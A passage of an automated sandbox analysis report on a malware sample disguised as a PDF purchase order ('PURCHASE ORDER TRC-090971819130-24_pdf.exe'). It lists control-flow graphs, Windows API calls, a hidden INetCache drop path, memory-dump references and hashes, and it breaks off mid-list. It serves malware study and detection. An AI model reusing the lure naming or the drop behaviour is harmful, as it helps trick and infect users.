328 403ee9-403f25 ShowWindow KiUserCallbackDispatcher call 40413b EnableWindow 299->328 304 403d4a-403d4f call 4040f2 300->304 305 403d21-403d27 301->305 306 403d2d-403d32 301->306 304->288 309 403d68-403d7b SendMessageW 305->309 310 403d29-403d2b 305->310 306->309 311 403d34-403d3a 306->311 309->288 310->304 315 403d51-403d5a call 40140b 311->315 316 403d3c-403d42 call 40140b 311->316 315->288 324 403d5c-403d66 315->324 325 403d48 316->325 324->325 325->304 327->328 331 403f27-403f28 328->331 332 403f2a 328->332 333 403f2c-403f5a GetSystemMenu EnableMenuItem SendMessageW 331->333 332->333 334 403f5c-403f6d SendMessageW 333->334 335 403f6f 333->335 336 403f75-403fb3 call 40414e call 406055 lstrlenW call 406077 SetWindowTextW call 401389 334->336 335->336 336->276 345 403fb9-403fbb 336->345 345->276 346 403fc1-403fc5 345->346 347 403fe4-403ff8 DestroyWindow 346->347 348 403fc7-403fcd 346->348 347->284 350 403ffe-40402b CreateDialogParamW 347->350 348->275 349 403fd3-403fd9 348->349 349->276 351 403fdf 349->351 350->284 352 404031-404088 call 404119 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 350->352 351->275 352->275 357 40408a-4040a2 ShowWindow call 404165 352->357 357->284
                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                                                    • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                                                    • DestroyWindow.USER32 ref: 00403CAE
                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403DB4
                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403E29
                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403F33
                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F52
                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                                                    • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                                                    • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3282139019-0
                                                                                                                                    • Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                                                    • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                                                    • Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                                                    • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                                                                                    • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                                    • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2206700289.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2206687623.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2206712677.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2206725097.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4227406936-0
                                                                                                                                    • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                                    • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                                                    • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                                    • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 700 406077-406082 701 406084-406093 700->701 702 406095-4060ab 700->702 701->702 703 4060b1-4060be 702->703 704 4062c3-4062c9 702->704 703->704 707 4060c4-4060cb 703->707 705 4060d0-4060dd 704->705 706 4062cf-4062da 704->706 705->706 710 4060e3-4060ef 705->710 708 4062e5-4062e6 706->708 709 4062dc-4062e0 call 406055 706->709 707->704 709->708 712 4062b0 710->712 713 4060f5-406131 710->713 714 4062b2-4062bc 712->714 715 4062be-4062c1 712->715 716 406251-406255 713->716 717 406137-406142 GetVersion 713->717 714->704 715->704 718 406257-40625b 716->718 719 40628a-40628e 716->719 720 406144-406148 717->720 721 40615c 717->721 722 40626b-406278 call 406055 718->722 723 40625d-406269 call 405f9c 718->723 725 406290-406298 call 406077 719->725 726 40629d-4062ae lstrlenW 719->726 720->721 727 40614a-40614e 720->727 724 406163-40616a 721->724 738 40627d-406286 722->738 723->738 730 40616c-40616e 724->730 731 40616f-406171 724->731 725->726 726->704 727->721 728 406150-406154 727->728 728->721 734 406156-40615a 728->734 730->731 736 406173-406199 call 405f22 731->736 737 4061ad-4061b0 731->737 734->724 748 406238-40623c 736->748 749 40619f-4061a8 call 406077 736->749 741 4061c0-4061c3 737->741 742 4061b2-4061be GetSystemDirectoryW 737->742 738->726 740 406288 738->740 744 406249-40624f call 4062e9 740->744 746 4061c5-4061d3 GetWindowsDirectoryW 741->746 747 40622e-406230 741->747 745 406232-406236 742->745 744->726 745->744 745->748 746->747 747->745 750 4061d5-4061df 747->750 748->744 755 40623e-406244 lstrcatW 748->755 749->745 752 4061e1-4061e4 750->752 753 4061f9-40620f SHGetSpecialFolderLocation 750->753 752->753 757 4061e6-4061ed 752->757 758 406211-406228 SHGetPathFromIDListW CoTaskMemFree 753->758 759 40622a 753->759 755->744 761 4061f5-4061f7 757->761 758->745 758->759 759->747 761->745 761->753
                                                                                                                                    APIs
                                                                                                                                    • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040613A
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B8
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061CB
                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                                                    • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406215
                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                                                    • lstrlenW.KERNEL32(Call,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040629E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                    • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                    • API String ID: 900638850-1230650788
                                                                                                                                    • Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                                                    • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                                                    • Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                                                    • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 762 405846-40586c call 405b11 765 405885-40588c 762->765 766 40586e-405880 DeleteFileW 762->766 768 40588e-405890 765->768 769 40589f-4058af call 406055 765->769 767 405a02-405a06 766->767 770 4059b0-4059b5 768->770 771 405896-405899 768->771 777 4058b1-4058bc lstrcatW 769->777 778 4058be-4058bf call 405a55 769->778 770->767 774 4059b7-4059ba 770->774 771->769 771->770 775 4059c4-4059cc call 406398 774->775 776 4059bc-4059c2 774->776 775->767 786 4059ce-4059e2 call 405a09 call 4057fe 775->786 776->767 780 4058c4-4058c8 777->780 778->780 782 4058d4-4058da lstrcatW 780->782 783 4058ca-4058d2 780->783 785 4058df-4058fb lstrlenW FindFirstFileW 782->785 783->782 783->785 787 405901-405909 785->787 788 4059a5-4059a9 785->788 802 4059e4-4059e7 786->802 803 4059fa-4059fd call 4051b4 786->803 790 405929-40593d call 406055 787->790 791 40590b-405913 787->791 788->770 793 4059ab 788->793 804 405954-40595f call 4057fe 790->804 805 40593f-405947 790->805 794 405915-40591d 791->794 795 405988-405998 FindNextFileW 791->795 793->770 794->790 798 40591f-405927 794->798 795->787 801 40599e-40599f FindClose 795->801 798->790 798->795 801->788 802->776 807 4059e9-4059f8 call 4051b4 call 405ef6 802->807 803->767 813 405980-405983 call 4051b4 804->813 814 405961-405964 804->814 805->795 808 405949-405952 call 405846 805->808 807->767 808->795 813->795 817 405966-405976 call 4051b4 call 405ef6 814->817 818 405978-40597e 814->818 817->795 818->795
                                                                                                                                    APIs
                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"), ref: 0040586F
                                                                                                                                    • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"), ref: 004058B7
                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"), ref: 004058DA
                                                                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"), ref: 004058E0
                                                                                                                                    • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"), ref: 004058F0
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
                                                                                                                                    • "C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe", xrefs: 0040584F
                                                                                                                                    • \*.*, xrefs: 004058B1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                    • String ID: "C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                    • API String ID: 2035342205-2446811607
                                                                                                                                    • Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                                                    • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                                                    • Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                                                    • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                                                    APIs
                                                                                                                                    • CoCreateInstance.OLE32(004085A8,?,?,00408598,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly, xrefs: 00402154
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInstance
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly
                                                                                                                                    • API String ID: 542301482-2045147251
                                                                                                                                    • Opcode ID: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                                                    • Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
                                                                                                                                    • Opcode Fuzzy Hash: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                                                    • Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNELBASE(75923420,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004063AF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                    • Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                                                    • Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
                                                                                                                                    • Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                                                    • Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                    • Opcode ID: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                                                    • Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
                                                                                                                                    • Opcode Fuzzy Hash: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                                                    • Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 360 40389e-4038b6 call 40642b 363 4038b8-4038c3 GetUserDefaultUILanguage call 405f9c 360->363 364 4038ca-403901 call 405f22 360->364 367 4038c8 363->367 370 403903-403914 call 405f22 364->370 371 403919-40391f lstrcatW 364->371 369 403924-40394d call 403b74 call 405b11 367->369 377 403953-403958 369->377 378 4039df-4039e7 call 405b11 369->378 370->371 371->369 377->378 380 40395e-403986 call 405f22 377->380 384 4039f5-403a1a LoadImageW 378->384 385 4039e9-4039f0 call 406077 378->385 380->378 386 403988-40398c 380->386 388 403a9b-403aa3 call 40140b 384->388 389 403a1c-403a4c RegisterClassW 384->389 385->384 390 40399e-4039aa lstrlenW 386->390 391 40398e-40399b call 405a36 386->391 402 403aa5-403aa8 388->402 403 403aad-403ab8 call 403b74 388->403 392 403a52-403a96 SystemParametersInfoW CreateWindowExW 389->392 393 403b6a 389->393 397 4039d2-4039da call 405a09 call 406055 390->397 398 4039ac-4039ba lstrcmpiW 390->398 391->390 392->388 396 403b6c-403b73 393->396 397->378 398->397 401 4039bc-4039c6 GetFileAttributesW 398->401 405 4039c8-4039ca 401->405 406 4039cc-4039cd call 405a55 401->406 402->396 412 403b41-403b49 call 405287 403->412 413 403abe-403ad8 ShowWindow call 4063bf 403->413 405->397 405->406 406->397 420 403b63-403b65 call 40140b 412->420 421 403b4b-403b51 412->421 418 403ae4-403af6 GetClassInfoW 413->418 419 403ada-403adf call 4063bf 413->419 424 403af8-403b08 GetClassInfoW RegisterClassW 418->424 425 403b0e-403b31 DialogBoxParamW call 40140b 418->425 419->418 420->393 421->402 426 403b57-403b5e call 40140b 421->426 424->425 430 403b36-403b3f call 4037ee 425->430 426->402 430->396
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                      • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                    • GetUserDefaultUILanguage.KERNELBASE(00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"), ref: 004038B8
                                                                                                                                      • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                                    • lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"), ref: 0040391F
                                                                                                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75923420), ref: 0040399F
                                                                                                                                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                                                    • GetFileAttributesW.KERNEL32(Call), ref: 004039BD
                                                                                                                                    • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving), ref: 00403A06
                                                                                                                                    • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                                                    • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
